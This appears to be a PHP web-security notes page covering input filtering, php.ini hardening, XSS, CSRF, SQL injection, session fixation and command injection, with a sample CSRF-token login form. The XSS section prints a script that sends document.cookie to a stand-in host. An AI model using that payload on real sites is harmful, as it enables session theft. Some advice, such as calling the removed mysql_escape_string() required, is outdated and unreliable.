IT Made Easy
The site provides some rough IT Notes that make your life easier. The site currently has notes on HTML, CSS, Regex, OOPS, JS, JQuery, PHP, Java, ASP.NET, C#, Database, Linux, URL Rewrite, SEO, Project Management and Hosting. Please do share this site if you like.

Security

  • Encrypt data, filter input and escape output. Examples: filter_var($field, FILTER_SANITIZE_EMAIL), filter_var($field, FILTER_VALIDATE_EMAIL), etc.
  • Turn off the special php.ini setting called magic_quotes_gpc. mysql_escape_string() is required to make user input safe for database entry.
  • Put key files outside the document root so they are not accessible. Also set appropriate file permissions and block relevant files and folders using .htaccess.
  • Set expose_php to OFF, use a different file extension and set display_errors to OFF. Set register_globals to OFF.
  • Spoofed forms can be used to attack a website through form submissions from different locations: the attacker copies the form code, replaces the form action with the absolute URL and replicates the form. Form submission itself cannot be prevented, but with spam checks, HTTP_REFERER checking and tight server-side validation we can secure our site.
  • Cross-Site Scripting (XSS) is a method where JavaScript is injected into a third-party site, say through a comment form, and execution of the script sends visiting users' personal data, such as cookies, to the attacker.

<script>
document.location = "http://example.org/getcookies.php?cookies=" + document.cookie;
</script>

This can be prevented by proper escaping of output, so the JavaScript won't execute when, say, a blog comment is displayed.

  • Cross-Site Request Forgery (CSRF) exploits the application's trust in the user. A user clicks on a third-party image or link and is taken to a site where an action is performed. The link forces the action because the website has a vulnerability: whenever the action is passed as a parameter, the action occurs. Attackers can even simulate POST requests. The user must be logged in for this to work. To prevent it, our genuine form should carry a hidden random value stored in the session, and the server should check that the value POSTed is the same as the one in SESSION before accepting the request.
  • SQL Injection. Use prepared statements or the driver-specific escape_string function.
  • Session fixation is an attack where the attacker fixes a session id and makes you access the application with that session id. Once you log in or move to a higher privilege, the attacker may be able to ride on the same session, since the session id is all the server cares about. This can be prevented by regenerating the session id using session_regenerate_id() on each change to a higher privilege.
  • Session hijacking is gaining the user's session and utilizing it. It can be checked by seeing if there is an HTTP_USER_AGENT change, but this is not 100% safe.
  • Remote Code Injection is an attack that occurs when a require or include statement is based on tainted user input.
  • Command injection occurs when tainted user input is used for shell execution. PHP provides escapeshellcmd() and escapeshellarg() as a means to properly escape data passed to the shell.
  • In shared hosting, use open_basedir (prevents opening files outside a path using include etc.), disable_functions (disables certain functions for security) and disable_classes (disables certain classes for security).
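The CSRF token and session-fixation notes above put together as an added example (not code from the original notes): a login page that stores a random token in the session, checks the POSTed copy against it, and calls session_regenerate_id() after login. The $users table and the password are constructed sample data.

```php
<?php
// Added example, not code from the original notes: per-session CSRF token plus
// session_regenerate_id() at the privilege change, as the notes describe.
session_start();
// Constructed sample user table (username => password_hash). Real code reads the DB.
$users = ['alice' => password_hash('correct horse battery staple', PASSWORD_DEFAULT)];

// One random token per session, reused by every form rendered in that session.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// The POSTed token must match the session copy; hash_equals avoids timing leaks.
function csrf_valid(array $post): bool
{
    return isset($post['csrf_token'], $_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

function handle_login(array $post, array $users): void
{
    if (!csrf_valid($post)) {
        http_response_code(403);
        exit('Form did not originate from this session');
    }
    $user = (string) ($post['user'] ?? '');
    if (!isset($users[$user]) || !password_verify((string) ($post['pass'] ?? ''), $users[$user])) {
        exit('Login failed');
    }
    // Privilege change: issue a fresh session id and delete the old one, so an
    // id an attacker fixed before login is not the id of the logged-in session.
    session_regenerate_id(true);
    $_SESSION['user'] = $user;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    handle_login($_POST, $users);
}
?>
<!-- The token is output through htmlspecialchars(), the escaping the XSS note calls for. -->
<form method="post" action="login.php">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input name="user"> <input name="pass" type="password">
  <button>Log in</button>
</form>
```

A request that arrives without the session's token, for example one sent from a copied form on another site, is rejected before the password is ever checked.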

IT Notes

by VinodSebastian
